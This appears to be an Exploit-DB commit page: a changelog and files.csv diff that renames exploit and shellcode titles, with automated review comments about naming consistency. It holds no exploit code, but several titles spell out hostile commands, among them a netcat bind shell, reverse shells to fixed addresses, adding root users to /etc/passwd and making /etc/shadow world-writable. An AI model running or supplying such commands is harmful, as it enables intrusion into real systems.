DB: 2017-07-12

9 new exploits

Apache 2.0.52 - HTTP GET request Denial of Service
Apache 2.0.52 - GET Request Denial of Service
Microsoft IIS - Malformed HTTP Request Denial of Service (1)
Microsoft IIS - Malformed HTTP Request Denial of Service (2)
Microsoft IIS - HTTP Request Denial of Service (1)
Microsoft IIS - HTTP Request Denial of Service (2)

Microsoft IIS - Malformed HTTP Request Denial of Service
Microsoft IIS - HTTP Request Denial of Service

Adobe Acrobat Reader 8.1.2 - Malformed '.PDF' Remote Denial of Service (PoC)
Adobe Acrobat Reader 8.1.2 - '.PDF' Remote Denial of Service (PoC)

Allegro RomPager 2.10 - Malformed URL Request Denial of Service
Allegro RomPager 2.10 - URL Request Denial of Service

AVM KEN! 1.3.10/1.4.30 - Malformed Request Remote Denial of Service
AVM KEN! 1.3.10/1.4.30 - Remote Denial of Service

Netwin SurgeFTP 1.0b - Malformed Request Denial of Service
Netwin SurgeFTP 1.0b - Denial of Service

iCal 3.7 - Malformed HTTP Request Denial of Service
iCal 3.7 - HTTP Request Denial of Service

3ware Disk Managment 1.10 - Malformed HTTP Request Denial of Service
3ware Disk Managment 1.10 - HTTP Request Denial of Service

Pi3Web 2.0.1 - Malformed GET Request Denial of Service
Pi3Web 2.0.1 - GET Request Denial of Service

Loom Software SurfNow 1.x/2.x - Remote HTTP GET Request Denial of Service
Loom Software SurfNow 1.x/2.x - Remote GET Request Denial of Service

Linksys PSUS4 PrintServer - Malformed HTTP POST Request Denial of Service
Linksys PSUS4 PrintServer - POST Request Denial of Service

Multiple IEA Software Products - HTTP POST Request Denial of Service
Multiple IEA Software Products - POST Request Denial of Service

Linksys WRH54G 1.1.3 Wireless-G Router - Malformed HTTP Request Denial of Service
Linksys WRH54G 1.1.3 Wireless-G Router - HTTP Request Denial of Service

Geo++ GNCASTER 1.4.0.7 - HTTP GET Request Denial of Service
Geo++ GNCASTER 1.4.0.7 - GET Request Denial of Service

D-Link WBR-2310 1.0.4 - HTTP GET Request Remote Buffer Overflow
D-Link WBR-2310 1.0.4 - GET Request Remote Buffer Overflow

Pelco VideoXpert 1.12.105 - Privilege Escalation

Apache Tomcat 3.2.3/3.2.4 - 'Source.jsp' Malformed Request Information Disclosure
Apache Tomcat 3.2.3/3.2.4 - 'Source.jsp' Information Disclosure

Apache Tomcat 3.2.3/3.2.4 - 'RealPath.jsp' Malformed Request Information Disclosure
Apache Tomcat 3.2.3/3.2.4 - 'RealPath.jsp' Information Disclosuree

PlanetDNS PlanetWeb 1.14 - Malformed Request Remote Buffer Overflow
PlanetDNS PlanetWeb 1.14 - Remote Buffer Overflow

AN HTTPD 1.38/1.39/1.40/1.41 - Malformed SOCKS4 Request Buffer Overflow
AN HTTPD 1.38/1.39/1.40/1.41 - SOCKS4 Request Buffer Overflow

Omnicron OmniHTTPd 2.x/3.0 - Get Request Buffer Overflow
Omnicron OmniHTTPd 2.x/3.0 - GET Request Buffer Overflow

JBoss 3.x/4.0.2 - Malformed HTTP Request Remote Information Disclosure
JBoss 3.x/4.0.2 - HTTP Request Remote Information Disclosure
Easy File Sharing Web Server 7.2 - GET HTTP Request Buffer Overflow (SEH)
Easy File Sharing Web Server 7.2 - HEAD HTTP Request Buffer Overflow (SEH)
Easy File Sharing Web Server 7.2 - GET Request Buffer Overflow (SEH)
Easy File Sharing Web Server 7.2 - HEAD Request Buffer Overflow (SEH)

Easy File Sharing Web Server 7.2 - GET HTTP Request 'PassWD' Buffer Overflow (SEH)
Easy File Sharing Web Server 7.2 - GET Request 'PassWD' Buffer Overflow (SEH)

Microsoft Windows Windows 8/2012 R2 (x64) - 'EternalBlue' SMB Remote Code Execution (MS17-010)
Microsoft Windows Windows 8/8.1/2012 R2 (x64) - 'EternalBlue' SMB Remote Code Execution (MS17-010)
Easy File Sharing Web Server 7.2 - GET HTTP Request 'PassWD' Buffer Overflow (DEP Bypass)
NfSen <= 1.3.7 / AlienVault OSSIM 5.3.4 - Command Injection
Easy File Sharing Web Server 7.2 - GET Request 'PassWD' Buffer Overflow (DEP Bypass)
Microsoft Windows Windows 7/8.1/2008 R2/2012 R2/2016 R2 - 'EternalBlue' SMB Remote Code Execution (MS17-010)

(Generator) - HTTP/1.x requests Shellcode (18+ bytes / 26+ bytes)
(Generator) - HTTP/1.x Requests Shellcode (18+ bytes / 26+ bytes)

Linux/x86-64 - flush iptables rules Shellcode (84 bytes)
Linux/x86-64 - Flush IPTables Rules Shellcode (84 bytes)

Linux/x86 - Self-modifying for IDS evasion Shellcode (64 bytes)
Linux/x86 - Self-Modifying Anti-IDS Shellcode (64 bytes)

Linux/x86 - Bind 8000/TCP + Add User with Root Access Shellcode (225+ bytes)
Linux/x86 - Bind 8000/TCP + Add Root User Shellcode (225+ bytes)
Linux/x86 - File unlinker Shellcode (18+ bytes)
Linux/x86 - Perl script execution Shellcode (99+ bytes)
Linux/x86 - file reader Shellcode (65+ bytes)
Linux/x86 - File Unlinker Shellcode (18+ bytes)
Linux/x86 - Perl Script Execution Shellcode (99+ bytes)
Linux/x86 - File Reader Shellcode (65+ bytes)

Linux/x86 - Add Root User 'r00t' Without Password To /etc/passwd Shellcode (69 bytes)
Linux/x86 - Add Root User (r00t) To /etc/passwd Shellcode (69 bytes)

Linux/x86 - execve /bin/sh anti-ids Shellcode (40 bytes)
Linux/x86 - execve /bin/sh Anti-IDS Shellcode (40 bytes)

Linux/x86 - Add User 'xtz' without Password to /etc/passwd Shellcode (59 bytes)
Linux/x86 - Add User (xtz) To /etc/passwd Shellcode (59 bytes)

Linux/x86 - 24/7 open cd-rom loop (follows /dev/cdrom symlink) Shellcode (39 bytes)
Linux/x86 -  Open CD-Rom Loop 24/7 (Follows /dev/cdrom Symlink) Shellcode (39 bytes)
Linux/x86 - Radically Self Modifying Code Shellcode (70 bytes)
Linux/x86 - Magic Byte Self Modifying Code Shellcode (76 bytes)
Linux/x86 - Radically Self-Modifying Shellcode (70 bytes)
Linux/x86 - Magic Byte Self-Modifying Shellcode (76 bytes)
Linux/x86 - Add User 't00r' encrypt Shellcode (116 bytes)
Linux/x86 - chmod 666 shadow ENCRYPT Shellcode (75 bytes)
Linux/x86 - Add User (t00r) Anti-IDS Shellcode (116 bytes)
Linux/x86 - chmod 666 /etc/shadow Anti-IDS Shellcode (75 bytes)

Linux/x86 - Add User 't00r' Shellcode (82 bytes)
Linux/x86 - Add User (t00r) Shellcode (82 bytes)
Linux/x86 - execve /bin/sh encrypted Shellcode (58 bytes)
Linux/x86 - execve /bin/sh xor encrypted Shellcode (55 bytes)
Linux/x86 - execve /bin/sh Anti-IDS Shellcode (58 bytes)
Linux/x86 - execve /bin/sh (XOR Encoded) Shellcode (55 bytes)

Linux/x86 - Add User 'z' Shellcode (70 bytes)
Linux/x86 - Add User (z) Shellcode (70 bytes)
Linux/x86 - hard / unclean reboot Shellcode (29 bytes)
Linux/x86 - hard / unclean reboot Shellcode (33 bytes)
Linux/x86 - Hard / Unclean Reboot Shellcode (29 bytes)
Linux/x86 - Hard / Unclean Reboot Shellcode (33 bytes)

Linux - Drop suid shell root in /tmp/.hiddenshell Polymorphic Shellcode (161 bytes)
Linux - Drop SUID Root Shell (/tmp/.hiddenshell) Polymorphic Shellcode (161 bytes)

Linux - _nc -lp 31337 -e /bin//sh_ Polymorphic Shellcode (91 bytes)
Linux - Bind Shell (nc -lp 31337 -e /bin//sh) Polymorphic Shellcode (91 bytes)

Linux - Find all writeable folder in filesystem polymorphic Shellcode (91 bytes)
Linux - Find All Writeable Folder In FileSystem Polymorphic Shellcode (91 bytes)
Linux/x86 - setuid(0) + setgid(0) + add user 'iph' Without Password to /etc/passwd Polymorphic Shellcode
Linux/x86 - Search For php/html Writable Files and Add Your Code Shellcode (380+ bytes)
Linux/x86 - setuid(0) + setgid(0) + Add User (iph) To /etc/passwd Polymorphic Shellcode
Linux/x86 - Search For PHP/HTML Writable Files and Add Your Code Shellcode (380+ bytes)

Linux/x86 - Remote Port Forwarding Shellcode (87 bytes)
Linux/x86 - Remote Port Forwarding (ssh -R 9999:localhost:22 192.168.0.226) Shellcode (87 bytes)

Linux/x86 - Reverse TCP Bind 192.168.1.10:31337 Shellcode (92 bytes)
Linux/x86 - Reverse TCP (192.168.1.10:31337) Shellcode (92 bytes)

Linux/x86 - Add map in /etc/hosts file (google.com 127.1.1.1) Shellcode (77 bytes)
Linux/x86 - Add Map (google.com 127.1.1.1) In /etc/hosts Shellcode (77 bytes)

Linux/x86 - Add Map google.com to 127.1.1.1 Obfuscated Shellcode (98 bytes)
Linux/x86 - Add Map (google.com 127.1.1.1) In /etc/hosts Obfuscated Shellcode (98 bytes)

Linux/x86 - /bin/sh ROT7 Encoded Shellcode
Linux/x86 - /bin/sh (ROT7 Encoded) Shellcode

Linux/x86 - /bin/sh ROL/ROR Encoded Shellcode
Linux/x86 - /bin/sh (ROL/ROR Encoded) Shellcode

Linux x86/x86-64 - tcp_bind Port 4444 Shellcode (251 bytes)
Linux x86/x86-64 - Bind 4444/TCP Shellcode (251 bytes)

Linux/x86-64 - Bind NetCat Shellcode (64 bytes)
Linux/x86-64 - Bind Netcat Shellcode (64 bytes)

Linux/x86 - Reverse zsh 9090/TCP Shellcode (80 bytes)
Linux/x86 - Reverse ZSH 127.255.255.254:9090/TCP Shellcode (80 bytes)
Linux - Multi/Dual mode execve(_/bin/sh__ NULL_ 0) Shellcode (37 bytes)
Linux - Multi/Dual mode Reverse Shell Shellcode (129 bytes)
Linux - execve(_/bin/sh__ NULL_ 0) Multi/Dual Mode Shellcode (37 bytes)
Linux - Reverse Shell Multi/Dual Mode Shellcode (Genearator) (129 bytes)

Linux - Dual/Multi mode Bind Shell Shellcode (156 bytes)
Linux - Bind Shell Dual/Multi Mode Shellcode (156 bytes)
Linux/x86-64 - Reverse NetCat Shellcode (72 bytes)
Linux/x86-64 - Reverse NetCat Polymorphic Shellcode (106 bytes)
Linux/x86-64 - Reverse Netcat Shellcode (72 bytes)
Linux/x86-64 - Reverse Netcat Polymorphic Shellcode (106 bytes)

Simple Machines Forum (SMF) 1.1.6 - HTTP POST Request Filter Security Bypass
Simple Machines Forum (SMF) 1.1.6 - POST Request Filter Security Bypass
NfSen < 1.3.7 / AlienVault OSSIM 5.3.4 - Command Injection
Pelco Sarix/Spectra Cameras - Cross-Site Request Forgery / Cross-Site Scripting
Pelco Sarix/Spectra Cameras - Cross-Site Request Forgery (Enable SSH Root Access)
Pelco Sarix/Spectra Cameras - Remote Code Execution
Pelco VideoXpert 1.12.105 - Directory Traversal
Pelco VideoXpert 1.12.105 - Information Disclosure
NfSen < 1.3.7 / AlienVault OSSIM 4.3.1 - 'customfmt' Command Injection
Offensive Security 2017-07-12 05:01:24 +00:00
parent 4407c920f7
commit ed107bc711
10 changed files with 1422 additions and 70 deletions

files.csv (148)

@ -140,7 +140,7 @@ id,file,description,date,author,platform,type,port
843,platforms/windows/dos/843.c,"KNet Web Server 1.04c - Buffer Overflow Denial of Service",2005-02-25,CorryL,windows,dos,0 843,platforms/windows/dos/843.c,"KNet Web Server 1.04c - Buffer Overflow Denial of Service",2005-02-25,CorryL,windows,dos,0
849,platforms/windows/dos/849.c,"Scrapland 1.0 - Server Termination Denial of Service",2005-02-28,"Luigi Auriemma",windows,dos,0 849,platforms/windows/dos/849.c,"Scrapland 1.0 - Server Termination Denial of Service",2005-02-28,"Luigi Auriemma",windows,dos,0
852,platforms/windows/dos/852.py,"Trillian Basic 3.0 - '.png' Image Processing Buffer Overflow",2005-03-02,"Tal Zeltzer",windows,dos,0 852,platforms/windows/dos/852.py,"Trillian Basic 3.0 - '.png' Image Processing Buffer Overflow",2005-03-02,"Tal Zeltzer",windows,dos,0
855,platforms/multiple/dos/855.pl,"Apache 2.0.52 - HTTP GET request Denial of Service",2005-03-04,GreenwooD,multiple,dos,0 855,platforms/multiple/dos/855.pl,"Apache 2.0.52 - GET Request Denial of Service",2005-03-04,GreenwooD,multiple,dos,0
856,platforms/hardware/dos/856.c,"Nokia Symbian 60 - 'BlueTooth Nickname' Remote Restart (2)",2005-09-23,Qnix,hardware,dos,0 856,platforms/hardware/dos/856.c,"Nokia Symbian 60 - 'BlueTooth Nickname' Remote Restart (2)",2005-09-23,Qnix,hardware,dos,0
861,platforms/windows/dos/861.c,"Microsoft Windows XP/2003 - Remote Denial of Service",2005-03-07,RusH,windows,dos,0 861,platforms/windows/dos/861.c,"Microsoft Windows XP/2003 - Remote Denial of Service",2005-03-07,RusH,windows,dos,0
867,platforms/multiple/dos/867.c,"Ethereal 0.10.9 - Denial of Service",2005-03-08,"Leon Juranic",multiple,dos,0 867,platforms/multiple/dos/867.c,"Ethereal 0.10.9 - Denial of Service",2005-03-08,"Leon Juranic",multiple,dos,0
@ -264,12 +264,12 @@ id,file,description,date,author,platform,type,port
1368,platforms/windows/dos/1368.cpp,"Counter Strike 2D 0.1.0.1 - Denial of Service",2005-12-11,"Iman Karim",windows,dos,0 1368,platforms/windows/dos/1368.cpp,"Counter Strike 2D 0.1.0.1 - Denial of Service",2005-12-11,"Iman Karim",windows,dos,0
1371,platforms/windows/dos/1371.c,"Macromedia Flash Media Server 2 - Remote Denial of Service",2005-12-14,Kozan,windows,dos,0 1371,platforms/windows/dos/1371.c,"Macromedia Flash Media Server 2 - Remote Denial of Service",2005-12-14,Kozan,windows,dos,0
1372,platforms/windows/dos/1372.html,"Microsoft Internet Explorer 6 - (pre tag Multiple single tags) Denial of Service",2005-12-14,"Markus Heer",windows,dos,0 1372,platforms/windows/dos/1372.html,"Microsoft Internet Explorer 6 - (pre tag Multiple single tags) Denial of Service",2005-12-14,"Markus Heer",windows,dos,0
1376,platforms/windows/dos/1376.c,"Microsoft IIS - Malformed HTTP Request Denial of Service (1)",2005-12-19,Kozan,windows,dos,0 1376,platforms/windows/dos/1376.c,"Microsoft IIS - HTTP Request Denial of Service (1)",2005-12-19,Kozan,windows,dos,0
1377,platforms/windows/dos/1377.pl,"Microsoft IIS - Malformed HTTP Request Denial of Service (2)",2005-12-19,kokanin,windows,dos,0 1377,platforms/windows/dos/1377.pl,"Microsoft IIS - HTTP Request Denial of Service (2)",2005-12-19,kokanin,windows,dos,0
1389,platforms/windows/dos/1389.html,"Microsoft Internet Explorer 6 - 'mshtml.dll datasrc' Denial of Service",2005-12-27,BuHa,windows,dos,0 1389,platforms/windows/dos/1389.html,"Microsoft Internet Explorer 6 - 'mshtml.dll datasrc' Denial of Service",2005-12-27,BuHa,windows,dos,0
1390,platforms/multiple/dos/1390.c,"BZFlag 2.0.4 - (undelimited string) Denial of Service",2005-12-27,"Luigi Auriemma",multiple,dos,0 1390,platforms/multiple/dos/1390.c,"BZFlag 2.0.4 - (undelimited string) Denial of Service",2005-12-27,"Luigi Auriemma",multiple,dos,0
1394,platforms/windows/dos/1394.html,"Microsoft Internet Explorer 6 - 'mshtml.dll div' Denial of Service",2005-12-29,rgod,windows,dos,0 1394,platforms/windows/dos/1394.html,"Microsoft Internet Explorer 6 - 'mshtml.dll div' Denial of Service",2005-12-29,rgod,windows,dos,0
1396,platforms/windows/dos/1396.cpp,"Microsoft IIS - Malformed HTTP Request Denial of Service",2005-12-29,Lympex,windows,dos,0 1396,platforms/windows/dos/1396.cpp,"Microsoft IIS - HTTP Request Denial of Service",2005-12-29,Lympex,windows,dos,0
1409,platforms/windows/dos/1409.pl,"BlueCoat WinProxy 6.0 R1c - GET Request Denial of Service",2006-01-07,FistFuXXer,windows,dos,0 1409,platforms/windows/dos/1409.pl,"BlueCoat WinProxy 6.0 R1c - GET Request Denial of Service",2006-01-07,FistFuXXer,windows,dos,0
1411,platforms/hardware/dos/1411.pl,"Cisco IP Phone 7940 - Reboot (Denial of Service)",2006-01-10,kokanin,hardware,dos,0 1411,platforms/hardware/dos/1411.pl,"Cisco IP Phone 7940 - Reboot (Denial of Service)",2006-01-10,kokanin,hardware,dos,0
1416,platforms/windows/dos/1416.c,"HomeFtp 1.1 - (NLST) Denial of Service",2006-01-14,pi3ch,windows,dos,0 1416,platforms/windows/dos/1416.c,"HomeFtp 1.1 - (NLST) Denial of Service",2006-01-14,pi3ch,windows,dos,0
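Review bot: after this rename, 1376, 1377 and 1396 all read "Microsoft IIS - HTTP Request Denial of Service", distinguished only by the "(1)"/"(2)" suffix on the first two; 1396 (Lympex, 2005-12-29) gets no suffix, so by title alone it cannot be told apart from the series. Either number it "(3)" to follow the convention already used for 1376/1377, or keep a qualifier in each title that says what differs between the three.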
@ -734,7 +734,7 @@ id,file,description,date,author,platform,type,port
5585,platforms/linux/dos/5585.pl,"rdesktop 1.5.0 - 'process_redirect_pdu()' BSS Overflow (PoC)",2008-05-11,"Guido Landi",linux,dos,0 5585,platforms/linux/dos/5585.pl,"rdesktop 1.5.0 - 'process_redirect_pdu()' BSS Overflow (PoC)",2008-05-11,"Guido Landi",linux,dos,0
5679,platforms/multiple/dos/5679.php,"PHP 5.2.6 - 'sleep()' Local Memory Exhaust Exploit",2008-05-27,Gogulas,multiple,dos,0 5679,platforms/multiple/dos/5679.php,"PHP 5.2.6 - 'sleep()' Local Memory Exhaust Exploit",2008-05-27,Gogulas,multiple,dos,0
5682,platforms/windows/dos/5682.html,"CA Internet Security Suite 2008 - 'SaveToFile()' File Corruption (PoC)",2008-05-28,Nine:Situations:Group,windows,dos,0 5682,platforms/windows/dos/5682.html,"CA Internet Security Suite 2008 - 'SaveToFile()' File Corruption (PoC)",2008-05-28,Nine:Situations:Group,windows,dos,0
5687,platforms/windows/dos/5687.txt,"Adobe Acrobat Reader 8.1.2 - Malformed '.PDF' Remote Denial of Service (PoC)",2008-05-29,securfrog,windows,dos,0 5687,platforms/windows/dos/5687.txt,"Adobe Acrobat Reader 8.1.2 - '.PDF' Remote Denial of Service (PoC)",2008-05-29,securfrog,windows,dos,0
5709,platforms/windows/dos/5709.pl,"freeSSHd 1.2.1 - Authenticated Remote Stack Overflow (PoC)",2008-05-31,securfrog,windows,dos,0 5709,platforms/windows/dos/5709.pl,"freeSSHd 1.2.1 - Authenticated Remote Stack Overflow (PoC)",2008-05-31,securfrog,windows,dos,0
5712,platforms/multiple/dos/5712.pl,"Samba 3.0.29 (client) - 'receive_smb_raw()' Buffer Overflow (PoC)",2008-06-01,"Guido Landi",multiple,dos,0 5712,platforms/multiple/dos/5712.pl,"Samba 3.0.29 (client) - 'receive_smb_raw()' Buffer Overflow (PoC)",2008-06-01,"Guido Landi",multiple,dos,0
5718,platforms/windows/dos/5718.pl,"Alt-N SecurityGateway 1.0.1 - 'Username' Remote Buffer Overflow (PoC)",2008-06-01,securfrog,windows,dos,0 5718,platforms/windows/dos/5718.pl,"Alt-N SecurityGateway 1.0.1 - 'Username' Remote Buffer Overflow (PoC)",2008-06-01,securfrog,windows,dos,0
@ -1274,7 +1274,7 @@ id,file,description,date,author,platform,type,port
10221,platforms/windows/dos/10221.txt,"XM Easy Personal FTP Server 5.8.0 - Remote Denial of Service",2009-11-24,leinakesi,windows,dos,21 10221,platforms/windows/dos/10221.txt,"XM Easy Personal FTP Server 5.8.0 - Remote Denial of Service",2009-11-24,leinakesi,windows,dos,21
10223,platforms/windows/dos/10223.txt,"TYPSoft FTP Server 1.10 - APPE DELE Denial of Service",2009-11-24,leinakesi,windows,dos,21 10223,platforms/windows/dos/10223.txt,"TYPSoft FTP Server 1.10 - APPE DELE Denial of Service",2009-11-24,leinakesi,windows,dos,21
10229,platforms/multiple/dos/10229.txt,"Python < 2.5.2 Imageop Module - 'imageop.crop()' Buffer Overflow",2009-11-24,"Chris Evans",multiple,dos,0 10229,platforms/multiple/dos/10229.txt,"Python < 2.5.2 Imageop Module - 'imageop.crop()' Buffer Overflow",2009-11-24,"Chris Evans",multiple,dos,0
10237,platforms/hardware/dos/10237.txt,"Allegro RomPager 2.10 - Malformed URL Request Denial of Service",2000-06-01,netsec,hardware,dos,80 10237,platforms/hardware/dos/10237.txt,"Allegro RomPager 2.10 - URL Request Denial of Service",2000-06-01,netsec,hardware,dos,80
10242,platforms/php/dos/10242.txt,"PHP < 5.3.1 - 'MultiPart/form-data' Denial of Service (Python)",2009-11-27,Eren,php,dos,0 10242,platforms/php/dos/10242.txt,"PHP < 5.3.1 - 'MultiPart/form-data' Denial of Service (Python)",2009-11-27,Eren,php,dos,0
10243,platforms/php/dos/10243.txt,"PHP - MultiPart Form-Data Denial of Service (PoC)",2009-11-22,"Bogdan Calin",php,dos,0 10243,platforms/php/dos/10243.txt,"PHP - MultiPart Form-Data Denial of Service (PoC)",2009-11-22,"Bogdan Calin",php,dos,0
10257,platforms/windows/dos/10257.py,"XM Easy Professional FTP Server 5.8.0 - Denial of Service",2009-11-30,"Mert SARICA",windows,dos,21 10257,platforms/windows/dos/10257.py,"XM Easy Professional FTP Server 5.8.0 - Denial of Service",2009-11-30,"Mert SARICA",windows,dos,21
@ -2364,7 +2364,7 @@ id,file,description,date,author,platform,type,port
19963,platforms/windows/dos/19963.txt,"PHP 6.0 - 'openssl_verify()' Local Buffer Overflow (PoC)",2012-07-20,"Yakir Wizman",windows,dos,0 19963,platforms/windows/dos/19963.txt,"PHP 6.0 - 'openssl_verify()' Local Buffer Overflow (PoC)",2012-07-20,"Yakir Wizman",windows,dos,0
19834,platforms/windows/dos/19834.txt,"Real Networks RealPlayer 6/7 - Location Buffer Overflow",2000-04-03,"Adam Muntner",windows,dos,0 19834,platforms/windows/dos/19834.txt,"Real Networks RealPlayer 6/7 - Location Buffer Overflow",2000-04-03,"Adam Muntner",windows,dos,0
19835,platforms/windows/dos/19835.txt,"SalesLogix Corporation eViewer 1.0 - Denial of Service",2000-03-31,"Todd Beebe",windows,dos,0 19835,platforms/windows/dos/19835.txt,"SalesLogix Corporation eViewer 1.0 - Denial of Service",2000-03-31,"Todd Beebe",windows,dos,0
19843,platforms/windows/dos/19843.java,"AVM KEN! 1.3.10/1.4.30 - Malformed Request Remote Denial of Service",2000-04-12,eAX,windows,dos,0 19843,platforms/windows/dos/19843.java,"AVM KEN! 1.3.10/1.4.30 - Remote Denial of Service",2000-04-12,eAX,windows,dos,0
19850,platforms/linux/dos/19850.c,"RedHat Linux 6.x - X Font Server Denial of Service / Buffer Overflow Vulnerabilities",2000-04-16,"Michal Zalewski",linux,dos,0 19850,platforms/linux/dos/19850.c,"RedHat Linux 6.x - X Font Server Denial of Service / Buffer Overflow Vulnerabilities",2000-04-16,"Michal Zalewski",linux,dos,0
19853,platforms/windows/dos/19853.txt,"FrontPage 97/98 - Server Image Mapper Buffer Overflow",2000-04-19,Narrow,windows,dos,0 19853,platforms/windows/dos/19853.txt,"FrontPage 97/98 - Server Image Mapper Buffer Overflow",2000-04-19,Narrow,windows,dos,0
19854,platforms/netware/dos/19854.sh,"Novell Netware 5.1 - Remote Administration Buffer Overflow",2000-04-19,"Michal Zalewski",netware,dos,0 19854,platforms/netware/dos/19854.sh,"Novell Netware 5.1 - Remote Administration Buffer Overflow",2000-04-19,"Michal Zalewski",netware,dos,0
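Review bot: 19843's new description, "AVM KEN! 1.3.10/1.4.30 - Remote Denial of Service", drops "Malformed Request" with nothing replacing it, so the title no longer says what is sent to the service. The other renames in this commit keep a request qualifier ("GET Request", "POST Request", "HTTP Request"); keep one here too, for example "AVM KEN! 1.3.10/1.4.30 - Request Remote Denial of Service".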
@ -2499,7 +2499,7 @@ id,file,description,date,author,platform,type,port
20654,platforms/hardware/dos/20654.pl,"APC WEB/SNMP Management Card (9606) Firmware 3.0 - Telnet Administration Denial of Service",2001-02-26,altomo,hardware,dos,0 20654,platforms/hardware/dos/20654.pl,"APC WEB/SNMP Management Card (9606) Firmware 3.0 - Telnet Administration Denial of Service",2001-02-26,altomo,hardware,dos,0
20655,platforms/windows/dos/20655.txt,"Orange Software Orange Web Server 2.1 - Denial of Service",2001-02-27,slipy,windows,dos,0 20655,platforms/windows/dos/20655.txt,"Orange Software Orange Web Server 2.1 - Denial of Service",2001-02-27,slipy,windows,dos,0
20656,platforms/windows/dos/20656.txt,"Robin Twombly A1 HTTP Server 1.0 - Denial of Service",2001-02-27,slipy,windows,dos,0 20656,platforms/windows/dos/20656.txt,"Robin Twombly A1 HTTP Server 1.0 - Denial of Service",2001-02-27,slipy,windows,dos,0
20659,platforms/multiple/dos/20659.txt,"Netwin SurgeFTP 1.0b - Malformed Request Denial of Service",2001-03-01,"the Strumpf Noir Society",multiple,dos,0 20659,platforms/multiple/dos/20659.txt,"Netwin SurgeFTP 1.0b - Denial of Service",2001-03-01,"the Strumpf Noir Society",multiple,dos,0
20662,platforms/windows/dos/20662.txt,"WhitSoft SlimServe - HTTPD 1.1 Get Denial of Service",2001-02-28,joetesta,windows,dos,0 20662,platforms/windows/dos/20662.txt,"WhitSoft SlimServe - HTTPD 1.1 Get Denial of Service",2001-02-28,joetesta,windows,dos,0
20664,platforms/windows/dos/20664.pl,"Microsoft IIS 5.0 - WebDAV Denial of Service",2001-03-08,"Georgi Guninski",windows,dos,0 20664,platforms/windows/dos/20664.pl,"Microsoft IIS 5.0 - WebDAV Denial of Service",2001-03-08,"Georgi Guninski",windows,dos,0
20681,platforms/windows/dos/20681.c,"Baltimore Technologies WEBsweeper 4.0 - Denial of Service",2001-01-22,honoriak,windows,dos,0 20681,platforms/windows/dos/20681.c,"Baltimore Technologies WEBsweeper 4.0 - Denial of Service",2001-01-22,honoriak,windows,dos,0
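Review bot: the new description for 20659, "Netwin SurgeFTP 1.0b - Denial of Service", keeps nothing about the trigger; "Malformed Request" was the only qualifier the title had, whereas the rest of this commit still names the request type after the cleanup. Consider "Netwin SurgeFTP 1.0b - Request Denial of Service" or similar. Also, the next context line, 20662 "WhitSoft SlimServe - HTTPD 1.1 Get Denial of Service", uses "Get" while this commit normalises titles to "GET Request"; it belongs in the same pass.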
@ -2749,7 +2749,7 @@ id,file,description,date,author,platform,type,port
22100,platforms/windows/dos/22100.txt,"Microsoft Internet Explorer 9 - Cross-Site Scripting Filter Bypass",2012-10-19,"Jean Pascal Pereira",windows,dos,0 22100,platforms/windows/dos/22100.txt,"Microsoft Internet Explorer 9 - Cross-Site Scripting Filter Bypass",2012-10-19,"Jean Pascal Pereira",windows,dos,0
22105,platforms/linux/dos/22105.c,"Linux Kernel 2.2 - 'mmap()' Local Denial of Service",2002-12-17,"Michal Zalewski",linux,dos,0 22105,platforms/linux/dos/22105.c,"Linux Kernel 2.2 - 'mmap()' Local Denial of Service",2002-12-17,"Michal Zalewski",linux,dos,0
22110,platforms/php/dos/22110.txt,"PHP-Nuke 6.0 - modules.php Denial of Service",2002-12-23,"Ing. Bernardo Lopez",php,dos,0 22110,platforms/php/dos/22110.txt,"PHP-Nuke 6.0 - modules.php Denial of Service",2002-12-23,"Ing. Bernardo Lopez",php,dos,0
22117,platforms/windows/dos/22117.txt,"iCal 3.7 - Malformed HTTP Request Denial of Service",2003-01-03,"securma massine",windows,dos,0 22117,platforms/windows/dos/22117.txt,"iCal 3.7 - HTTP Request Denial of Service",2003-01-03,"securma massine",windows,dos,0
22118,platforms/windows/dos/22118.txt,"iCal 3.7 - Remote Buffer Overflow",2003-01-03,"securma massine",windows,dos,0 22118,platforms/windows/dos/22118.txt,"iCal 3.7 - Remote Buffer Overflow",2003-01-03,"securma massine",windows,dos,0
22119,platforms/windows/dos/22119.html,"Microsoft Pocket Internet Explorer 3.0 - Denial of Service",2003-01-03,"Christopher Sogge Røtnes",windows,dos,0 22119,platforms/windows/dos/22119.html,"Microsoft Pocket Internet Explorer 3.0 - Denial of Service",2003-01-03,"Christopher Sogge Røtnes",windows,dos,0
22121,platforms/windows/dos/22121.pl,"EType EServ 2.9x - FTP Remote Denial of Service",2003-01-04,D4rkGr3y,windows,dos,0 22121,platforms/windows/dos/22121.pl,"EType EServ 2.9x - FTP Remote Denial of Service",2003-01-04,D4rkGr3y,windows,dos,0
@ -2765,7 +2765,7 @@ id,file,description,date,author,platform,type,port
22191,platforms/linux/dos/22191.pl,"Apache Web Server 2.0.x - MS-DOS Device Name Denial of Service",2003-01-22,"Matthew Murphy",linux,dos,0 22191,platforms/linux/dos/22191.pl,"Apache Web Server 2.0.x - MS-DOS Device Name Denial of Service",2003-01-22,"Matthew Murphy",linux,dos,0
22196,platforms/windows/dos/22196.txt,"Rediff Bol 2.0.2 - URL Handling Denial of Service",2003-01-23,"S G Masood",windows,dos,0 22196,platforms/windows/dos/22196.txt,"Rediff Bol 2.0.2 - URL Handling Denial of Service",2003-01-23,"S G Masood",windows,dos,0
22197,platforms/linux/dos/22197.txt,"slocate 2.5/2.6 - Local Buffer Overrun",2003-01-24,"USG team",linux,dos,0 22197,platforms/linux/dos/22197.txt,"slocate 2.5/2.6 - Local Buffer Overrun",2003-01-24,"USG team",linux,dos,0
22207,platforms/multiple/dos/22207.txt,"3ware Disk Managment 1.10 - Malformed HTTP Request Denial of Service",2003-01-30,"Nathan Neulinger",multiple,dos,0 22207,platforms/multiple/dos/22207.txt,"3ware Disk Managment 1.10 - HTTP Request Denial of Service",2003-01-30,"Nathan Neulinger",multiple,dos,0
22214,platforms/windows/dos/22214.pl,"Apple QuickTime Player 7.7.2 - Crash (PoC)",2012-10-24,coolkaveh,windows,dos,0 22214,platforms/windows/dos/22214.pl,"Apple QuickTime Player 7.7.2 - Crash (PoC)",2012-10-24,coolkaveh,windows,dos,0
22215,platforms/windows/dos/22215.txt,"Microsoft Word 2010 - Crash (PoC)",2012-10-24,coolkaveh,windows,dos,0 22215,platforms/windows/dos/22215.txt,"Microsoft Word 2010 - Crash (PoC)",2012-10-24,coolkaveh,windows,dos,0
